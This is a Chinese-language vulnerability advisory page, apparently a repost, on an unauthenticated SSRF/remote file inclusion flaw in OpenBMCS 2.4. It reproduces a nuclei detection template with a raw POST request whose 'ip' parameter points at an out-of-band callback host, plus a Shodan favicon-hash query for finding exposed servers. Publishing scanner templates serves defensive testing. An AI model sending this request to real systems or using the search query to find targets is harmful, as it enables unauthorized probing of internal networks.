OpenBMCS 24 Server-Side Request Forgery / Remote File Inclusion Vulnerability

漏洞信息

漏洞名称: OpenBMCS 2.4 Server-Side Request Forgery / Remote File Inclusion Vulnerability

漏洞类型: 服务器端请求伪造

漏洞等级: 中危

漏洞描述: OpenBMCS 2.4是一款开源的基板管理控制器软件,主要用于服务器硬件监控和管理。它广泛应用于企业级服务器管理中,提供硬件状态监控、远程控制等功能。该软件在2.4版本中存在服务器端请求伪造(SSRF)和远程文件包含(RFI)漏洞,攻击者可以利用这些漏洞进行未授权的服务器请求和文件包含操作。

漏洞的技术根源在于OpenBMCS在处理POST参数’ip’时未进行充分的输入验证,导致攻击者可以构造恶意请求,迫使应用程序向任意外部主机发起HTTP请求。这种漏洞通常由于应用程序对外部输入的处理不当,未能正确限制请求的目标地址范围。

此漏洞的安全风险主要体现在攻击者可以利用SSRF漏洞探测内网服务、绕过防火墙限制,甚至结合其他漏洞实现远程代码执行。由于漏洞利用无需认证,攻击门槛较低,且可以自动化执行,因此对部署了OpenBMCS的企业构成了中等级别的安全威胁。管理员应及时更新软件版本或应用补丁,以避免潜在的安全风险。

产品厂商: OpenBMCS

产品名称: OpenBMCS

影响版本: 2.4

搜索语法: http.favicon.hash:1550906681

来源: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/http%2Fmisconfiguration%2Fopenbmcs%2Fopenbmcs-ssrf.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

id: openbmcs-ssrf

info:
  name: OpenBMCS 2.4 - Server-Side Request Forgery /  Remote File Inclusion
  author: dhiyaneshDK, NaN-KoreLogic
  severity: medium
  description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
  reference:
    - https://www.exploit-db.com/exploits/50670
    - https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1550906681
  tags: ssrf,oast,openbmcs,edb,misconfig

http:
  - raw:
      - |
        POST /php/query.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        ip={{interactsh-url}}:{{Port}}&argu=/

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"

      - type: status
        status:
          - 302
# digest: 490a0046304402205155d95257b9c18693f3de6fccafad786fdbe03a9942202d2ec16a4a4c52cfb002204fed2d95c0f6f82a6f73210e7279aff69284f3e7079c9906bd3b61735bcbb9ae:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #服务器端请求伪造
OpenBMCS 24 Server-Side Request Forgery / Remote File Inclusion Vulnerability
http://example.com/2025/07/06/github_37989097/
作者
lianccc
发布于
2025年7月6日
许可协议